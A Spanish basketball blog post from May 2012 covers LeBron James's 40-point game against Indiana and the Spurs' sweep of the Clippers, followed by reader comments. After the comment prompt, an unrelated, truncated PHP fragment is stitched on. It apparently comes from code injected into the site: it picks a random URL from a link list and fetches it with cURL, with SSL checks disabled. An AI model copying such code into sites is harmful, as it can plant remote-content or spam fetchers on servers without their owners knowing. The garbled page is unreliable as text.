La Crónica: Dos modelos

21 de May de 2012 por TheDeerHunter

En ocasiones el baloncesto es simple y directo. Dársela al bueno y a correr. Olvidémonos de triángulos raros, bloqueos ciegos, complicadas series de pases, desmarques… Como mucho un bloqueo directo y que se la guise rápido. Multiplicar los intervinientes en la jugada puede multiplicar las opciones posibles de error. Este modelo puede funcionar muy bien si tienes gente como LeBron, Durant, Westbrook o Wade.

Ayer vimos la cúspide de este estilo con la actuación individual más antológica del año (quizás de muchos años) protagonizada por LeBron James, extraordinariamente bien secundado por un corregido Wade y un eficaz Udonis Haslem. En cambio, los Pacers no supieron anoche imponer sus virtudes colectivas. Falló lo principal que puede marcar diferencias. El juego interior arrastró problemas de faltas y por ahí se fue el partido. La línea exterior no es ni remotamente equiparable a la de Miami, menos aún si toca la de arena con George Hill.

Salvando las distancias la actuación de anoche de LeBron recuerda a la de Magic de center en su primer anillo. También evoca a la destroza que les hizo el propio LeBron a los Pistons en 2007 para alcanzar su primera final, aunque entonces no le tocó jugar de 4. Podemos estar hablando de una de las mejores actuaciones de su carrera. Esto en su caso son palabras muy mayores. Indiana no encontró ninguna solución para minimizarle y así no tiene sentido complicar el juego. Había que hacer sangre, la hizo y dejará a los Pacers comiéndose la cabeza un par de días con un resultado decepcionante (101-93).

Por contra los Spurs cerraron con barrida su eliminatoria atendiendo al modelo inverso. Hasta 5 jugadores distintos fueron partícipes de la resolución, durante los últimos 5 minutos, del duelo más complicado y apretado que les ha tocado afrontar durante esta serie. Por contra los Clippers le daban la responsabilidad inexorablemente a Paul, con la diferencia que en este caso Popovic sí tenía la tecla para neutralizarlo (102-99). Es alucinante observar cómo bebe el juego de pase de los Spurs de aquellos Kings de Bibby y Webber. En esta situación cuantos más elementos intervengan en la jugada mucho más impredecible e indefendible es. A los Parker, Ginobili y Duncan anoche se sumaba la eficaz aportación de Green, Neal y Splitter. Cualquiera puede ser vital para ellos.

Estamos ansiosos por comprobar su desempeño en la final de conferencia que les aguarda. El excelso nivel de este equipo es algo que no terminamos de creer.

PREMIOS

MVP: Lebron James demuestra que si hace falta ya jugará un 5 vs 1 para llevarse el anillo. La exhibición que nos dejó anoche es antológica: 40 puntos, 18 rebotes, 9 asistencias, 2 robos y 2 tapones. Dwyane Wade fue su escudero perfecto con 30 puntos, 9 rebotes y 6 asistencias. ¡Imparables! Tim Duncan no falló a su puntual cita y fue de nuevo el mejor de los Spurs con 21 puntos, 9 rebotes, 4 asistencias y 3 tapones.

Sorpresa: Eric Bledsoe ha protagonizado buenos momentos en estos playoffs. Anoche anotó 8 de sus 10 lanzamientos y acabó con 17 puntos, 11 de ellos en el último cuarto.

Decepción: Esta vez los interiores de los Pacers no pudieron marcar diferencias. 10 puntos para Roy Hibbert y tan solo 8 para David West. 

Esfuerzo en vano: A pesar de las lesiones, Chris Paul peleó por alargar un poco más la serie frente los Spurs. Desgraciadamente, sus 23 puntos, 11 asistencias, 6 rebptes y 2 robos no fueron suficientes.

Imágenes | AP Photos / Getty Images

Comenta

28 comentarios a esta entrada

  1. Andorra98 dice:
    #1

    Grandisimo partido de Lebron y Wade. Si Miami quiere pasar la eliminatoria tiene que repetir el camino de ayer, que TODOS cierren el rebote como hicieron ayer, anulando segundas oportunidades y palmeos al juego interior de Indiana. En ataque está claro que Miami es un “pasamela que yo me la juego”, pero en defensa es otro cantar, si es culpa de Spoelstra o no es otro cantar…

      Citar

  2. Andorra98 dice:
    #2

    Andorra98: Grandisimo partido de Lebron y Wade. Si Miami quiere pasar la eliminatoria tiene que repetir el camino de ayer, que TODOS cierren el rebote como hicieron ayer, anulando segundas oportunidades y palmeos al juego interior de Indiana. En ataque está claro que Miami es un “pasamela que yo me la juego”, pero en defensa es otro cantar, si es culpa de Spoelstra o no es otro cantar…

    Ayer-ayer…cantar-cantar…. Madre mia, que bien me expreso…. ¬¬

      Citar

  3. nba dice:
    #3

    Esto, Bird ya no se puede vestir de corto aunque sea el GM ?, es que viendo el partido de anoche sin duda habría sido de gran ayuda

      Citar

  4. rumbero dice:
    #4

    “Hola Spoelstra, me llamo Lebron, y si hoy quieres sacarme a mi y a cuatro conos con la camiseta de la Heat me da igual, vamos a ganar el partido. Eso si, en la segunda parte cambias a uno de los conos por aquel que te abronca en el banquillo y me haces un favor”
    Yo con Lebron siempre tengo el “si pero es que…”. Ayer mismo después del partido de Durant en el Staples ya rajaba interiormente sobre su MVP, pero es que luego viene el tio y saca el rodillo de esta manera. Pues nada, a sacarse el sombrero. Y los Pacers a la que les falla su juego interior pues no les llega con los “pequeños”. Vital el siguiente partido.

    Y los Spurs pues nada, a su bola. 4-0 y para casa. Yo tengo una ganas tremendas de verlos en la final de conferencia para ver si realmente estan al nivel que parece, porque si es asi, ojito. Parker amo y señor, el mejor Duncan de los últimos años, un Manudo que siempre aparece cuando quema el balón y una bateria de jugadores dispuestos a cumplir cuando es necesario.
    De los Clippers esperaba algo más. Supongo que esa remontada “made in Clippers” que vivieron en sus carnes en el tercer partido enterró cualquier posibilidad de plantar algo de cara. No se que balance global harán de la temporada, pero parece claro que solo con Paul y Griffin no les vale

      Citar

  5. Sancho88 dice:
    #5

    Impresionante Lebron!! No entiendo a los haters de este super clase. Es admirable su devoción por este juego, el respeto por la canasta y el baloncesto que demuestra en cada partido y la exhibición individual y colectiva que ofrece. Hace cualquier cosa, la sube como base, la pasa como base, la machaca como pívot, juega el 1×1 con una facilidad pasmosa, sabe defender a tíos altos… no sé, es el tipo más completo que yo jamás haya visto en una cancha de basket. Es más completo que Bryant, aunque ni mucho menos más talentoso, pero a mí me gusta más Lebron porque no huele a puro egoísmo. De Bryant siempre tengo la sospecha de que quiere gustarse, tirar las canastas más complicadas y meterlas para verse en las highlights. Lebron es infinitamente más práctico. No sé, creo que en realidad es mi jugador favorito. Si los haters le odian solo por las tonterías que hacía en el pasado de los polvos de talco y las bromas con sus compañeros de los Cavaliers, o por hacer el gesto del chosen one y ese tipo de tonterías… es que ese hater para mí no merece respeto, porque se fija en aspectos tontos, en el envoltorio en vez de en el contenido. Y para mí, como contenido, Lebron James merece todos mis respeto, creo que a este ritmo puede llegar a 5 MVP’s o los que él quiera, y verdaderamente me alegraré mucho el día que consiga su primer anillo, porque lleva luchando como un jabato para conseguirlo desde el primer día que pisó una cancha en la NBA.

    Además, que creo que todos hemos sido super exigentes con él, y a excepción de tiros clave en el clutch time, para mí no me ha decepcionado ni un ápice sobre todas las espectativas que tenía puestas sobre él y su carrera deportiva. Chapó en todos los aspectos, y casi inmejorable en todo. A mí este señor ya me tiene conquistado hasta que se retire. Será un hall of famer segurísimo

      Citar

  6. Andorra98 dice:
    #6

    Sancho88: Impresionante Lebron!! No entiendo a los haters de este super clase. Es admirable su devoción por este juego, el respeto por la canasta y el baloncesto que demuestra en cada partido y la exhibición individual y colectiva que ofrece. Hace cualquier cosa, la sube como base, la pasa como base, la machaca como pívot, juega el 1×1 con una facilidad pasmosa, sabe defender a tíos altos… no sé, es el tipo más completo que yo jamás haya visto en una cancha de basket. Es más completo que Bryant, aunque ni mucho menos más talentoso, pero a mí me gusta más Lebron porque no huele a puro egoísmo. De Bryant siempre tengo la sospecha de que quiere gustarse, tirar las canastas más complicadas y meterlas para verse en las highlights. Lebron es infinitamente más práctico. No sé, creo que en realidad es mi jugador favorito. Si los haters le odian solo por las tonterías que hacía en el pasado de los polvos de talco y las bromas con sus compañeros de los Cavaliers, o por hacer el gesto del chosen one y ese tipo de tonterías… es que ese hater para mí no merece respeto, porque se fija en aspectos tontos, en el envoltorio en vez de en el contenido. Y para mí, como contenido, Lebron James merece todos mis respeto, creo que a este ritmo puede llegar a 5 MVP’s o los que él quiera, y verdaderamente me alegraré mucho el día que consiga su primer anillo, porque lleva luchando como un jabato para conseguirlo desde el primer día que pisó una cancha en la NBA.Además, que creo que todos hemos sido super exigentes con él, y a excepción de tiros clave en el clutch time, para mí no me ha decepcionado ni un ápice sobre todas las espectativas que tenía puestas sobre él y su carrera deportiva. Chapó en todos los aspectos, y casi inmejorable en todo. A mí este señor ya me tiene conquistado hasta que se retire. Será un hall of famer segurísimo

    Creo que tienes gran parte de razón. Con Lebron James y con Kobe Bryant se ha sido ultraexigente por la etiqueta maldita de “nuevo Jordan”. Y eso es mucha critica continua. Pero es cierto que Lebron James temporada tras temporada es mejor jugador en todos y cada uno de sus apartados, tanto en el juego individual como en el colectivo. LJ necesita el anillo de campeón tanto como el anillo le necesita a el. Se retirará como uno más de ese escalón final de leyendas de la NBA, estoy seguro.

      Citar

  7. nba dice:
    #7

    Se tiene “tirria” con Lebron en general, por su comportamiento, recordad como se mofaban del banquillo de Dallas en las finales del año pasado , sin venir a cuento , con Dirk griposo, creo recordar .
    Que es una bestia no lo discute nadie, pero estos comportamientos que enumero son los que en cierta manera alimentan a sus “haters”.

      Citar

  8. HisRoyalAirness dice:
    #8

    Es evidente que la actuación de Lebron de ayer es legendaria…pero aquí nos pasa todos los días que nunca vemos más allá. Ayer había que traspasar a Wade, hoy James es uno de los grandes de la historia. Yo aún no me he olvidado de sus finales del año pasado, por ejemplo. Hay mucho que reconocerle pero también ha hecho deméritos.
    Deciais ayer que los Spurs aún no se han enfrentado a nadie (Clippers y Utah) pero es que los propios Jazz son de un nivel muy similar a los Pacers. Los Heat sí que aún no se han enfrentado a nadie y posiblemente no lo hagan hasta llegar a la final, si llegan. Los PO del Este son bastante flojitos, creo que cualquier equipo del oeste ya eliminado sería allí finalista de conferencia.
    Lebron es un crack, de acuerdo, pero Tim Duncan, con 10 años más, jugando 30 minutos por partido y al tran-tran está en la final de conferencia habiendo dominado desde el silencio. Esa es la grandeza del basket

      Citar

  9. Esteban dice:
    #9

    lo de james es algo de otro muindo, pero ya lo hablamos ayer

    hoy toca la eliminacion de los clippers, una PENA QUE TERMINE EN BARRAIDA, pero era de esperar perdwer la serie luego de un cansancio mayusculo frente a un equipo que venia descansado

    no ha sido una serie tan facil como aparenta los numeros, tanto el sabado y el domingo, los clippers podrian haber ganado los juegos y nadie se hubiese quejado, y si bien en san antonio la diferencia del total fue abultada en cada juego, las primeras mitades de ambos fueron duras

    sin duda san antonio es mejor equipo que clippers, como tamb creo que es el mejor equipo en conjunto de la nba, aun por ensima de pacers y celtics

    LA LLEGADA DE CP3 ELEVO LA BARA, en un proyecto comun, llegar a PO un año, con tantos jovenes seria bueno, y fantastico eliminar a menphis sin ventaja de localia,

    pero la llegada de paul, que se sumaba a bulter y ademas estaba billups, hacia parecer que tenian experiencia suficiente como para ganar la liga, bueno la lesion de billups, debio haber cambioado la concepcion de unos clippers retadores al titulo, pero no, parece que nadie se acuerda que falta el

    sin billups, les ha quedado nun equipo que depende mucho de jovenes sin experiencia en PO, principalmente griffin su goleador, y dos titulares de nivel bajisimi, como jordan y foye, dos jugadores que no estan a la altura de ser titulares en segunda ronda

    datos que le quedan a los clippers

    JORDAN: durante la temp regular su contrato parecia malo, bueno desp de ver los PO su contrato es un desastre, pensar que le quedan 3 años mas en el equipo, a razon de 10 millones por año, hacen pensar que por su culpa los clippers no podran armar un equipo campeon. Ya sabemos que es malo en ataque, peto ahora tamb parecio malo e inexperto en defensa, mas alla de sus tapas, y malo en el rebote, alguien debe estar pensando en la oferta que hizo warriors y por q diablos la igualraon

    BUTLER: otro mas, no queria ir a LA, asi que tuvieron q romper el chanchito y pagarle 8 millonmes al año y le quedan dos mas, cuando estaba billups las defensas se olvidaban de el al inicio de temporada y sello unos primeros meses a nivel genial, pero con lka lesion de big shot, debio ocupar un lugar de segundo anotador perimetral, cosa que nunca hizo y su rendimniento y numeros vinieron en picada, sus 8 millones por los proximos dos años tamb doleran, sobretodo por que esta mas proximop de ser suplente que de ser un titular indiscutido

      Citar

  10. TheDeerHunter dice:
    #10

      Citar

  11. nba dice:
    #11

    Veremos si esta noche Pau se da cuenta de que o mejora sus actuaciones o los unicos que preguntaran por el en el verano seran los Bobcats, teniendo en cuenta que es 100% seguro que sale de Lakers a ver si tira de un poco de orgullo y nos deja un buen sabor de boca en una de sus ultimas apariciones como Laker

      Citar

  12. simon dice:
    #12

    TheDeerHunter:
    Al loro con la historia: http://www.blogdebasket.com/2012/05/21/los-61-puntos-de-chris-paul

    No la conocias Deer? Creo que es de las historias que mas bombo le han dado desde que Paul llegó a la liga.

      Citar

  13. Jose Luis dice:
    #13

    Orlando Magic acaba de despedir a Otis Smith (General Manager) y Stan Van Gundy (entrenador). Supongo que para contentar a Howard. Den por saco al payaso éste, ojalá Van Gundy gane un anillo (ya que Howard no creo que lo gane, al menos siendo un jugador importante del equipo).

      Citar

  14. melo15 dice:
    #14

    Pues no se si lo va a ganar a no el anillo (Howard) pero si que va a ser un jugador muy importante el proximo lustro. De Stan Van Gundy no puedo opinar mucho, pero todo el mundo sabe lo mal GM que ha sido Smith, transformo el equipo mas equilibrado de la NBA en un equipo mediocre, que solo va a playoffs gracias a Howard

      Citar

  15. Esteban dice:
    #15

    q agradezca smith q solo lo echaron y que no le pidieron indemnizacion opor los daños caujsados

      Citar

  16. rumbero dice:
    #16

    Me uno al club de fans de Holiday propiedad de Sancho. Está jugando muy bien hasta el momento y lleva unos PO mas que buenos. Se les puede hacer largo el partido a los Sixers en el Garden pero estan demostrando ser un equipo competitivo como parecian ser a principio de temporada. Si hoy hasta Brand se ha apuntado a la moda de los 4 rejuvenecidos!

      Citar

  17. rumbero dice:
    #17

    Vaya tercet cuarto!! El Garden apretando, los verdes defendiendo, Rondo dando un recital y…Bass reencarnado en Duncan+Barkley+Webber. Si no me he descontado ha hecho 18 puntos en el tercer cuarto.
    Mal los Sixers. Evans amasando demasiado pelota. Suerte de alguns rebotrs ofensivos y de Lavoy Allen (sisi…)

      Citar

  18. rumbero dice:
    #18

    El resumen podría ser que los verdes han empezado a defender mas despues del descanso, los Sixers se han colapsado y Bass ha estado genial en el tercer cuarto.
    El mio es que Rondo es un escándalo de jugador. Buenas noches

      Citar

  19. Lucho dice:
    #19

      Citar

  20. Nacho dice:
    #20

    ¡Qué cosa más mala para los amarillos!

      Citar

  21. Nacho dice:
    #21

    Sólo están a 5 puntos. Pero les pinta mal. Parece que se acaba la serie.
    Un dato: asistencias 7 a 1 OKC. 1º cuarto.

      Citar

  22. Nacho dice:
    #22

    Será flor de un instante, pero en este segundo cuarto Bynum, Gasol, Ebanks, Blake y Sessions le han dado la vuelta a la cosa. Gasol lleva todos los minutos del partido, supongo que se irá en este tiempo muerto. Dos arriba Lakers, aunque de momento yo seguiría poniendo mi dinero a los Thunder.

      Citar

  23. Nacho dice:
    #23

    Sessions pierde una bola de las que te prohíben perder en primero de ESO. Sefo se va al contraataque y MWP le hace una falta que creo que ni es. Al rato la dan como Flagrante. Metta se cabrea, normal, técnica. Kobe dice algo, técnica. 4 libres sequidos de OKC y dan la vuelta al marcador.
    Narro esto porque se ha hablado mucho de los árbitros que favorecen a Lakers, pero en esta serie creo que si alguien se puede quejar son ellos.
    por otro lado, descanso, tres arriba thunder. La tercera de Bynum ha hecho jugar a Metta de 4. Ha fucionado el equipo. Los primeros 18 minutos 2 asistencias. Los últimos 6, 4. Kobe, ninguna.
    ¿Qué modelo para la segunda parte?
    veremos.

      Citar

  24. Nacho dice:
    #24

    Otra pérdida de Sessions, contraataque de Westbrook, le agarra el bueno de Ramon, y el de OKC suelta la bola y la mete. Justo antes Collison mete un rebote ofensivo. Cosas como esta cambian las dinámicas. Si no se hunden LAL, el partido estaba bonito e igualado.

      Citar

  25. Nacho dice:
    #25

    Sigo narrando, que esto muy solo. Final de tercer cuarto e inicio d cuarto, y OKC meten la directa.
    11 arriba. 15-4 el parcial. Otro triple de Durant. Bye bye Lakers.

      Citar

  26. Nacho dice:
    #26

    Kobe es gilipollas. Para ver su tontería ataque a falta de 4 30 aprox, y siguiente. Y se irá contento con sus 40 puntos.
    Hala, a dormir.

      Citar

  27. futurman dice:
    #27

    Con los porcentajes de Kobe y que te ganen de 16… yo también me quemaría. Aunque claro, en un equipo en el que se dan 4 asistencias…normal que se te desconecten los jugadores (Marrón, eres entrenador, haz cosas!!!).

    El único que ha dado la talla ha sido Gasol, que así acaba con buen cartel. Espero que Lakers larguen a Marrón y consigan un buen trade por Pau. Un exterior decente, algún pick bueno, banquillo…

      Citar

  28. GreenPride dice:
    #28

    Bueno pues de repente a Batman se le unió Robin…. Partido importantísimo en la carrera de LeBron que empezó dando pinta de que se les iba el partido y media eliminatoria. Durante los 2 primeros cuartos LeBron luchó casi en solitario contra un equipo de los Pacers confiado y con el apoyo de su público. Fueron minutos en los que parecía que en cuanto LeBron aflojara la diferencia se iría de 20 para arriba ya que en los Heat un horrendo Wade no le ayudaba y el resto del equipo andaba medio desaparecido. En esta fase perdonaron los de Indiana que deberían haber sentenciado el partido pero les dejaron llegar dentro de él al descanso. Y he ahí que al bueno de Dwayne no se le había olvidado jugar y se unió a LeBron en el tercer cuarto para entre los 2 dar toda una exhibición y voltear el partido y quién sabe si la eliminatoria y la historia de estos PO. Gran ayuda la que ofreció también Haslem en el último cuarto metiendo algunos tiros abiertos decisivos. 40 para LeBron pero más impresionante su labor en el rebote y como fue él contra todos durante los 2 primeros cuartos. Ahora la eliminatoria vuelve a Miami sin estar nada nada clara. Los Heat necesitan a Wade a este nivel y que Lebron no baje el pistón para poder pasar. Los Pacers imponer su juego interior y desde ahí abrir espacios para sus tiradores. Apasionante 5º partido el que espera.
    En LA, los Clippers acabaron su andadura barridos por los eficacísimos Spurs. En los Clippers último esfuerzo de CP3 que por fin jugó un partido digno del gran jugador que es y los Clippers estuvieron cerca de ganarlo. Al final, el mismo CP3 no pudo con la defensa de ayudas de los Spurs en las últimas jugadas. Ahora espera una final de conferencia apasionante. Son 18 victorias seguidas para los Spurs que juegan un baloncesto super equilibrado con Duncan dando lecciones al poste, Parker y Manudo haciendo de las suyas y unos jugadores complementarios que son super-importantes y que te matan pues cada día asume uno un rol de anotador importante, unos días Leonard, otro Green, otro Diaw, otro Splitter. El mejor equipo de los que quedan con permiso de unos Celtics sin tantos jugadores de calidad aunque sí con un espíritu parecido.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>